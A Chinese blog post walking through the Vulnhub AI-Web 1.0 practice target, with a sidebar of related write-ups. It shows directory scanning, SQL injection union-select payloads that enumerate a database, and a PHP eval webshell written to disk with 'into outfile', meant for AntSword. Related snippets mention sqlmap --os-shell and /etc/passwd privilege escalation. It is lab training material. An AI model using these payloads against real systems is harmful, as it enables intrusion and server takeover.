Ai-web 1.0靶场通关攻略

最新推荐文章于 2025-04-01 11:00:00 发布
最新推荐文章于 2025-04-01 11:00:00 发布
阅读量625 收藏 11
点赞数 12
CC 4.0 BY-SA版权
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cjchsh/article/details/145994216

1.环境

虚拟机:kali

靶机:ai-web-1.0

2.获取靶机ip

确认靶机ip为192.168.13.160

3.获取绝对路径

用御剑扫描发现两个路径

http://192.168.13.160/robots. txt和http://192.168.13.160/index.html

发现一些路径

用kali的dirb扫描发现一个info.php文件

浏览器访问

获得了网站的绝对路径

4.判断是否存在注入

用dirb扫描另一个路径

发现一个index.php文件,浏览器访问

页面显示提交框,猜测存在sql注入

输入框输入1提交,页面正常,出现回显

输入框输入1'提交,发现报sql语句错,存在sql注入漏洞

5.获取数据库名

使用burpsuite抓包,得到注入点位置。输入1提交抓包

判断列数

' order by 3#

4时出错所以为3列

说明此数据库有三列,下面确定回显位

' union select 1,2,3#

然后获取数据库名称

' union select 1,database(),3#

该数据库名称为 aiweb1

之后sql注入流程,后面可以查询表名,字段名,用户数据等信息。

6.一句话木马上传文件

由于这个网站页面没有登陆框,获取不到用户登陆信息,所以查询数据库数据没有用。

-1' union select 1,<?php @eval($_POST["cmd"]);?>,3 into outfile '/home/www/html/web1x44329002sdf92213/se3reTdir777/uploads/2.php'#

上传成功后路径打开2.php蚁剑连接成功我的找不到路径

cjchsh
关注
记录一次vulnhub:AI-WEB-1.0靶场复现
sszsNo1的博客
06-24 371
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
API测试(一):PortSwigger靶场笔记
aaaadoga的博客
07-14 1152
这篇文章是关于作者在学习PortSwigger的API Test类型漏洞时的记录和学习笔记
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1649
AIweb2靶场渗透测试
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 781
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
Vulnhub靶场--AI-Web-1.0提权获取flag
qq_53830529的博客
05-16 1052
vulnhub实战靶场中的AI-Web-1.0,使用两种SQL注入上传shell的方法,第一:SQLmap的--os-shell上传shell,第二:通过手动into outfile上传webshell。
AIweb1靶场总结
胖虎的博客
11-03 588
aiweb1靶场总结
Vulnhub-AI-Web1.0靶场通关攻略
最新发布
qq_65852138的博客
04-01 563
【代码】Vulnhub-AI-Web1.0靶场通关攻略
⽹络安全学习计划
qq_45541451的博客
07-15 6830
网络安全脚本小子学习计划 如何成为脚本小子第N天,制定的学习计划 网络安全的具体学习计划网络安全脚本小子学习计划第⼀阶段~信息安全基础1、信息安全基础2、nmap安装与使⽤3、burpsuite安装与使⽤⼆、Web基础三、Web安全⼊⻔四、信息收集五、漏洞原理第⼆阶段~基础知识学习⼀、程序设计⼆、⽹络技术三、Linux四、数据库拓展第三阶段~渗透测试实战与⽹络安全⼀、web安全基础与拓展⼆、web安全攻防⼀、环境搭建⼆、WEB安全⼯具基础部分三、常⻅web漏洞解析四、web安全⼯具进阶及拓展五、web安全
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 4384
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场,vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
AI WEB靶场
weixin_53198216的博客
07-29 270
再输入路径/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/7.打开sqlmap 输入python sqlmap.py -r 1.txt --os-shell。8.选择[4]php后再选择[2]custom location。3.进入这个目录/se3reTdir777/uploads/5.进行抓包,将得到的数据包复制出来保存成一个txt文件。6.在uid前加一个*后保存文件。2.根据扫描到的端口进入地址。4.判断是否存在sql注入。
AI-Web靶场通关攻略
Nai_zui_jiang的博客
08-19 343
使用dirb对/m3diNf0/目录进行扫描 会找到一个info.php文件 我们在网站上打开,得到网站的绝对路径。使用抓包工具进行抓包,并在uid=1后面加上 * 然后复制到一个txt文件里面,这里我的是创建的1.txt文件。尝试--os-shell 这里需要绝对路径,我们之前已经找到绝对路径所以可以直接尝试连接--os-shell。继续使用dirb对/se3reTdir777目录进行扫描,找到一个index.php文件,访问。我们可以选择在本机也就是物理机上下载sqlmap,然后再进行注入。
aiweb1.0靶场通关攻略
2401_88387979的博客
12-04 691
虚拟机:kali靶机:ai-web-1.0
AI WEB靶场(通关攻略)
m0_68706634的博客
12-04 557
进行 sql 注入漏洞探测时语法-u的域名是需要带参数的,但post传参时url框中没有参数,这时使用bp抓包(抓post传参时的参数),方便之后查询。然后继续尝试在绝对路径后加入之前得到的两个目录/m3diNf0/,/se3reTdir777/uploads/可以看到目录下并无任何文件,这时我们可以试着访问它的上级目录/se3reTdir777/可以得到两个目录为/m3diNf0/,/se3reTdir777/uploads/可以看到/m3diNf0/目录也没有权限,再试试另外一个。
鹏城AI靶场助力大规模高质量中文语料数据集安全开放
OpenI启智社区
09-02 549
鹏城实验室率先开放大规模高质量中文语料数据集,研究人员可在鹏城AI靶场上安全使用数据
打靶归来!盛派 AI 提示词靶场初体验
盛派开发者社区
08-27 917
当然,盛派提示词靶场的功能还有很多,例如参数模型中有很多的参数可以进行模型请求参数调整,我们还可以用更加丰富的提示词来验证我们的需求。可能我们在对话的前几次所的用提示词,所得到的大模型答复,要比这次最新的要更好。正如软件工程要不断迭代,通过不断的“小步快跑”,从而不断完善我们的提示词工程,最终命中靶心!所以我们为了解决这个问题,为了我们能向我们所期望的目标不断进发,不断的完善和优化提示词,以便于我们命中。“如果大家用过一段时间大模型和提示词后,我们会发现,我们和大模型对话时,使用的提示词,一定不是。
Al-Web 1.0 靶机渗透
2401_82451607的博客
08-19 434
Al-Web 1.0 靶机渗透
AI-web 1.0靶机通关攻略
2301_81383433的博客
03-04 487
查询Kali的IP用nmap扫描同C段下的主机,找到靶机IP。
AIWEB1综合靶场通关教程,从外网打到内网【附靶场环境】
xt350488的博客
08-03 1369
靶场获取后台回下载之后设置为nat模式启动即可,不需要登录。
AI-Web-1 靶场
weixin_46044002的博客
06-23 436
还记的之前出现的phpinfo页面吗?页面中暴露了网站的绝对路径,那我们就可以利用sqlmap拿shell。显示中有一个什么什么uploads,一个文件上传的目录。emmm,我直呼好家伙,这不是相当于还是啥也没有。一样的,环境搭好了,但是啥也没有,先找他的ip。我把靶机环境移除,在重新打开,页面出来了。得到数据,但都不是靶机的登录信息。有个info.php访问看看。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值